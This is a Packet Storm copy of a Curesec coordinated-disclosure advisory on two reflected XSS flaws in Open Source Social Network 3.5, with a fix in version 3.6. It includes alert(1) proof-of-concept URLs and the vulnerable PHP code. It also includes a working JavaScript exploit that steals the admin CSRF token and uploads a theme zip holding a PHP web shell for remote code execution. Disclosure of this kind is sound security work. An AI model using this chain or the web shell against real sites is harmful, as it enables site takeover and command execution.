Open Source Social Network 3.5 Cross Site Scripting

2015-11-16T00:00:00
ID PACKETSTORM:134351
Type packetstorm
Reporter Tim Coen
Modified 2015-11-16T00:00:00

Description

                                        
                                            `Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Open Source Social Network 3.5  
Product:  
Fixed in: 3.6  
Fixed Version https://www.opensource-socialnetwork.org/downloads/  
Link: ossn-v3.6-1443545762.zip  
Vendor Contact: https://www.opensource-socialnetwork.org/contact  
Vulnerability XSS  
Type:  
Remote Yes  
Exploitable:  
Reported to 09/29/2015  
vendor:  
Disclosed to 11/13/2015  
public:  
Release mode: Coordinated release  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Overview  
  
There are two reflected XSS vulnerabilities in Open Source Social Network 3.5.  
With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF  
protection, which in this case may lead to code execution.  
  
3. XSS 1  
  
CVSS  
  
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N  
  
Proof of Concept  
  
  
http://localhost/ossn/search?q='"></script><script>alert(1)</script>  
  
Code  
  
  
/ossn/themes/default/plugins/menus/search.php  
$menus = $params['menu'];  
echo "<div class='ossn-menu-search'>";  
echo '<div class="title">' . ossn_print('result:type') . '</pre>';  
foreach ($menus as $menu => $val) {  
foreach ($val as $link) {  
$menu = str_replace(':', '-', $link['text']);  
$icon = ossn_site_url() . "components/OssnSearch/images/{$menu}.png";  
$text = ossn_print($link['text']);  
$link = $link['href'];  
echo "<li><a href='{$link}'>  
<img src='{$icon}' />  
<div class='text'>{$text}</pre>  
</a>  
</li>";  
}  
}  
echo '</pre>';  
  
4. XSS 2  
  
CVSS  
  
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N  
  
Proof of Concept  
  
  
http://localhost/ossn/home?offset=2&foo='"></script><script>alert(1)</script>  
  
Code  
  
  
/ossn/themes/default/pagination/view.php  
if (count($_GET)) {  
$args_url = '';  
foreach ($_GET as $key => $value) {  
if ($key != 'page') {  
$args_url .= '&' . $key . '=' . $value;  
}  
}  
}  
[...]  
$url = "?offset={$first}{$args_url}";  
echo "<li><a href='{$url}' class='ossn-pagination-page'>".ossn_print('ossn:pagination:first')."</a></li>";  
  
5. XSS to Code Execution  
  
Description  
  
Because the backend allows the upload of PHP files, the XSS vulnerabilities can  
lead to code execution.  
  
Proof of Concept  
  
  
http://localhost/ossn/search?q='"><script src=http://localhost/s.js></script>  
  
/s.js:  
var csrfProtectedPage = 'http://localhost/ossn/administrator/theme_installer';  
  
var html = get(csrfProtectedPage);  
document.body.innerHTML = html;  
var token = document.getElementsByName("ossn_token")[0].value;  
var timestamp = document.getElementsByName("ossn_ts")[0].value;  
  
submitRequest(token, timestamp);  
  
function get(url) {  
var xmlHttp = new XMLHttpRequest();  
xmlHttp.open("GET", url, false);  
xmlHttp.send(null);  
return xmlHttp.responseText;  
}  
  
function submitRequest(token, timestamp) {  
var xhr = new XMLHttpRequest();  
xhr.open("POST", "http://localhost/ossn/action/admin/theme_install", true);  
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1441530840601255132539565608");  
xhr.withCredentials = true;  
var body = "-----------------------------1441530840601255132539565608\r\n" +  
"Content-Disposition: form-data; name=\"ossn_ts\"\r\n" +  
"\r\n" +  
"" + timestamp + "\r\n" +  
"-----------------------------1441530840601255132539565608\r\n" +  
"Content-Disposition: form-data; name=\"ossn_token\"\r\n" +  
"\r\n" +  
"" + token + "\r\n" +  
"-----------------------------1441530840601255132539565608\r\n" +  
"Content-Disposition: form-data; name=\"theme_file\"; filename=\"mycustomtheme.zip\"\r\n" +  
"Content-Type: application/x-zip-compressed\r\n" +  
"\r\n" +  
"PK\x03\x04\x14\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00mycustomtheme/PK\x03\x04\n" +  
"\x03\x00\x00\x00\x00\xbcx\x3cG\xf6+\xec\x8e\x1c\x00\x00\x00\x1c\x00\x00\x00\x15\x00\x00\x00mycustomtheme/404.php\x3c?php passthru($_GET[\'x\']);\n" +  
"PK\x03\x04\n" +  
"\x03\x00\x00\x00\x00\xe1x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00mycustomtheme/ossn_theme.phpPK\x03\x04\n" +  
"\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00mycustomtheme/ossn_theme.xmlPK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00mycustomtheme/PK\x01\x02?\x03\n" +  
"\x03\x00\x00\x00\x00\xbcx\x3cG\xf6+\xec\x8e\x1c\x00\x00\x00\x1c\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81,\x00\x00\x00mycustomtheme/404.phpPK\x01\x02?\x03\n" +  
"\x03\x00\x00\x00\x00\xe1x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81{\x00\x00\x00mycustomtheme/ossn_theme.phpPK\x01\x02?\x03\n" +  
"\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81\xb5\x00\x00\x00mycustomtheme/ossn_theme.xmlPK\x05\x06\x00\x00\x00\x00\x04\x00\x04\x00\x13\x01\x00\x00\xef\x00\x00\x00\x00\x00\r\n" +  
"-----------------------------1441530840601255132539565608--\r\n";  
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);  
xhr.send(new Blob([aBody]));  
}  
  
6. Solution  
  
To mitigate this issue please upgrade at least to version 3.6:  
  
https://www.opensource-socialnetwork.org/downloads/ossn-v3.6-1443545762.zip  
  
Please note that a newer version might already be available.  
  
7. Report Timeline  
  
09/29/2015 Informed Vendor about Issue  
09/29/2015 Vendor releases fix  
11/13/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/Open-Source-Social-Network-35-XSS-92.html  
  
  
`